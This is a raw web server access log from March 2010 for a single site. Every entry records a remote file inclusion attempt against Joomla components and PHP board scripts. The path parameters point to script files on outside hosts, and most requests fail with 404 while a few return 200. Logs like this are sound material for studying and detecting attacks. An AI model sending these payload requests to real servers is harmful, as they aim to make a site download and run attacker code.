203.251.80.167 - - [07/Mar/2010:08:17:26 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:08:17:29 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:08:17:29 -0800] "GET /logs/access_100217.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:17:32 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:17:32 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:17:32 -0800] "GET /logs/access_100222.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:08:17:33 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:17:35 -0800] "GET /logs/access_100208.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:08:17:36 -0800] "GET /logs/download.php?board_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:08:17:36 -0800] "GET /download.php?board_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:08:17:36 -0800] "GET /logs/access_100217.log/download.php?board_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:08:17:37 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:08:17:41 -0800] "GET /logs/access_100217.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:08:17:48 -0800] "GET /logs/access_100206.log//write_comment_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [07/Mar/2010:08:17:50 -0800] "GET /logs/access_100219.log//write_update.php?board_skin_path=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [07/Mar/2010:08:17:50 -0800] "GET /logs//write_update.php?board_skin_path=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.221 - - [07/Mar/2010:08:17:50 -0800] "GET /write_update.php?board_skin_path=http://galabau-peine.de//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:08:17:56 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:08:17:58 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:08:18:01 -0800] "GET /logs/access_100217.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:08:18:49 -0800] "GET /logs/access_100219.log/download.php?board_skin_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.238.8.107 - - [07/Mar/2010:08:19:12 -0800] "GET /config.php?path_to_root=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.238.8.107 - - [07/Mar/2010:08:19:12 -0800] "GET /logs/config.php?path_to_root=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.238.8.107 - - [07/Mar/2010:08:19:12 -0800] "GET /logs/access_100217.log%20%20/config.php?path_to_root=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.238.8.107 - - [07/Mar/2010:08:19:23 -0800] "GET /logs/access_100217.log%20%20/config.php?path_to_root=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.238.8.107 - - [07/Mar/2010:08:19:23 -0800] "GET /logs/config.php?path_to_root=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.238.8.107 - - [07/Mar/2010:08:19:23 -0800] "GET /config.php?path_to_root=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [07/Mar/2010:08:20:26 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://galabau-peine.de//id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:21:12 -0800] "GET /logs/access_100226.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:23:25 -0800] "GET /logs/access_100226.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [07/Mar/2010:08:23:29 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [07/Mar/2010:08:23:29 -0800] "GET /logs/access_100208.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [07/Mar/2010:08:23:29 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:24:50 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:24:51 -0800] "GET /logs/access_100203.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:24:58 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:08:25:13 -0800] "GET /logs/access_100202.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:25:40 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:25:40 -0800] "GET /logs/access_100203.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:25:44 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:26:14 -0800] "GET /logs/access_100208.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:26:19 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:26:20 -0800] "GET /logs/access_100203.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:26:22 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:26:29 -0800] "GET /logs/access_100203.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:26:31 -0800] "GET /logs/access_100208.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:26:35 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:26:46 -0800] "GET /logs/access_100219.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:08:26:52 -0800] "GET /logs/access_100202.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:26:59 -0800] "GET /logs/access_100219.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:08:27:07 -0800] "GET /logs/access_100202.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:08:27:26 -0800] "GET /logs/access_100202.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:27:26 -0800] "GET /logs/access_100208.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:27:29 -0800] "GET /logs/access_100208.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:08:27:40 -0800] "GET /logs/access_100202.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.238.8.107 - - [07/Mar/2010:08:27:53 -0800] "GET /logs/access_100217.log/config.php?path_to_root=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.238.8.107 - - [07/Mar/2010:08:27:57 -0800] "GET /logs/access_100217.log/config.php?path_to_root=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:27:59 -0800] "GET /logs/access_100219.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:28:01 -0800] "GET /logs/access_100219.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.238.8.107 - - [07/Mar/2010:08:28:14 -0800] "GET /logs/access_100201.log/config.php?path_to_root=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.238.8.107 - - [07/Mar/2010:08:28:18 -0800] "GET /logs/access_100201.log/config.php?path_to_root=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [07/Mar/2010:08:28:45 -0800] "GET /logs/access_100227.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://galabau-peine.de//id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [07/Mar/2010:08:28:46 -0800] "GET /logs/access_100202.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://galabau-peine.de//id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.142.208.158 - - [07/Mar/2010:08:29:17 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
91.142.208.158 - - [07/Mar/2010:08:29:17 -0800] "GET /logs/access_100208.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
91.142.208.158 - - [07/Mar/2010:08:29:17 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
219.150.205.155 - - [07/Mar/2010:08:29:54 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
219.150.205.155 - - [07/Mar/2010:08:30:01 -0800] "GET /logs/access_100128.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
219.150.205.155 - - [07/Mar/2010:08:30:01 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:30:02 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:08:30:03 -0800] "GET /logs/access_100217.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:08:30:03 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:08:30:03 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:08:30:04 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:08:30:04 -0800] "GET /logs/access_100217.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:08:30:04 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:30:05 -0800] "GET /logs/access_100217.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:30:08 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:30:08 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:30:09 -0800] "GET /logs/access_100217.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:30:11 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:30:11 -0800] "GET /logs/access_100217.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:30:11 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:30:17 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:30:17 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:30:17 -0800] "GET /logs/access_100217.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:08:30:29 -0800] "GET /logs/access_100212.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.206.144 - - [07/Mar/2010:08:30:31 -0800] "GET /logs/access_100212.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.vistadelmarchurch.org/language/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [07/Mar/2010:08:30:54 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
219.150.205.155 - - [07/Mar/2010:08:30:55 -0800] "GET /logs/access_100217.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:31:17 -0800] "GET /logs/access_100217.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:31:17 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:31:17 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:31:22 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:31:22 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:31:22 -0800] "GET /logs/access_100217.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:31:54 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:31:54 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:31:54 -0800] "GET /logs/access_100217.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:31:54 -0800] "GET /logs/access_100217.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:31:54 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:08:31:54 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:32:09 -0800] "GET /config.php?path_to_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:08:32:11 -0800] "GET /logs/config.php?path_to_root=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.156 - - [07/Mar/2010:08:32:36 -0800] "GET /logs/access_100222.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
219.150.205.155 - - [07/Mar/2010:08:32:36 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
219.150.205.155 - - [07/Mar/2010:08:32:36 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
